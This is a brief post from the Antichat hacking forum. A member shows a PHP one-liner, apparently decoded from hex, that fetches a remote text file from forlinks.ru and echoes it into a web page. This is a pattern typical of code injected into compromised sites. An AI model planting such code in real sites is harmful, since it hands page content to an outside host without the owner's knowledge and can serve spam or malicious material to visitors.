
07.01.2008, 21:44
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме: 5939734
Репутация:
1917
|
|
$site = "http://www.forlinks.ru/l/l.txt";if(@function_exists("curl_version")){$ch = curl_init();curl_setopt($ch, CURLOPT_URL,$site);curl_setopt($ch, CURLOPT_FAILONERROR, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_TIMEOUT, 4);echo @curl_exec($ch);curl_close($ch);}else echo @file_get_contents($site);
это hex значения символов
__________________
Карфаген должен быть разрушен...
|
|
|